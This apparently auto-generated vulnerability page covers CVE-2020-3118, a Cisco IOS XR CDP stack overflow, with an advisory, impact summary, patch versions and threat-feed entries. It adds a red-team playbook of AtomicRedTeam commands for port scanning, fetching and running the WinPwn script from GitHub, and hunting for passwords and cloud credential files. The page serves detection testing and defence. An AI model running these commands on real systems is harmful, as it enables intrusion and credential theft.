CVE-2020-3118
Overview
This vulnerability is a stack-based buffer overflow caused by improper validation of string input fields within Cisco Discovery Protocol (CDP) messages processed by Cisco IOS XR Software. The flaw resides in the parsing logic of CDP packets, a Layer 2 protocol, where certain string fields are not adequately checked for length or content, leading to memory corruption. The affected component is the Cisco Discovery Protocol implementation in multiple versions of Cisco IOS XR.
Vulnerability Description
A vulnerability in the Cisco Discovery Protocol implementation for Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a reload on an affected device. The vulnerability is due to improper validation of string input from certain fields in Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to cause a stack overflow, which could allow the attacker to execute arbitrary code with administrative privileges on an affected device. Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).
Impact
An unauthenticated attacker located within the same broadcast domain can exploit this vulnerability to execute arbitrary code with administrative privileges on the targeted device or cause it to reload unexpectedly. This enables full compromise of the affected IOS XR device, allowing control over network infrastructure, disruption of service, or lateral movement within the network. No authentication or user interaction is required, but physical or logical adjacency at Layer 2 is mandatory.
Solution
Cisco has released security updates addressing this vulnerability in Cisco IOS XR Software versions 5.2.6 and later, 6.4.3 and later, and 6.5.4 and later. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce, available at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce. No specific workarounds are recommended; timely patching is essential to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Cisco Discovery Protocol implementation within Cisco IOS XR Software arises from inadequate validation of string inputs in specific fields of the protocol messages. This flaw allows an unauthenticated attacker, positioned within the same broadcast domain as the affected device, to send crafted packets that can lead to a stack overflow. When exploited, this condition may enable the attacker to execute arbitrary code with administrative privileges, thereby compromising the integrity and availability of the device. The nature of the vulnerability highlights a critical weakness in the handling of protocol messages, which are essential for network device discovery and management.
Exploitation of this vulnerability can occur through several attack vectors. An attacker must be adjacent to the target device, meaning they must reside within the same Layer 2 broadcast domain. This proximity requirement limits the attack surface to local network environments, but it does not diminish the severity of the threat. Once an attacker sends a malicious Cisco Discovery Protocol packet, the improper handling of the input can trigger a stack overflow. This overflow can overwrite the return address on the stack, redirecting execution flow to the attacker's code. Scenarios could include a malicious insider or an external attacker gaining access to a poorly secured network segment, enabling them to exploit this vulnerability and potentially gain control over critical network infrastructure.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Cisco IOS XR Software for their network operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete device failure. The ability to execute arbitrary code with administrative privileges means that an attacker could manipulate network configurations, intercept traffic, or deploy further malicious payloads within the network. The business risks associated with such an incident include financial losses, reputational damage, and potential regulatory penalties, especially if sensitive customer data is compromised.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected devices is crucial, as Cisco has released updates to address this flaw. Network segmentation can also play a vital role in reducing the risk of exploitation by limiting the broadcast domains and isolating critical infrastructure from less secure areas. Additionally, monitoring network traffic for unusual patterns or anomalies associated with Cisco Discovery Protocol messages can help identify potential exploitation attempts. Employing intrusion detection systems (IDS) and maintaining robust access control policies will further enhance the security posture against such vulnerabilities.
In conclusion, the vulnerability in Cisco Discovery Protocol presents a serious threat to the security of devices running IOS XR Software. The potential for unauthorized code execution by an adjacent attacker underscores the need for organizations to prioritize network security, particularly in environments where critical infrastructure is involved. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare and implement effective detection and mitigation strategies to safeguard their networks against such threats.
CSURFACE threat intelligence has identified a marked escalation in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-3118, which has surged by over 4000%, reaching a level that places it in the 96th percentile of exploit likelihood. This rapid increase, coupled with an accelerating upward trend over the past week, signals growing attacker interest or improved exploitability conditions, despite no new public exploit details emerging. The heightened EPSS suggests that adversaries may be prioritizing this vulnerability for reconnaissance or attack campaigns, increasing the urgency for defenders to monitor related network traffic and anomalous Cisco Discovery Protocol activity. Consequently, the risk profile of CVE-2020-3118 has intensified, reflecting a transition from a theoretical or low-probability threat to one with a substantially elevated potential for exploitation in operational environments.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios Xr | All |
cpe:2.3:o:cisco:ios_xr:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xr | All |
cpe:2.3:o:cisco:ios_xr:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xr | 6.5.3 |
cpe:2.3:o:cisco:ios_xr:6.5.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xr | 5.2.5 |
cpe:2.3:o:cisco:ios_xr:5.2.5:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xr | 6.4.2 |
cpe:2.3:o:cisco:ios_xr:6.4.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xr | 6.6.25 |
cpe:2.3:o:cisco:ios_xr:6.6.25:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xr | 7.0.1 |
cpe:2.3:o:cisco:ios_xr:7.0.1:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-3118 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/156203/Cisco-Discovery-Protocol-CDP-Remote-Device-Takeover.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3118 |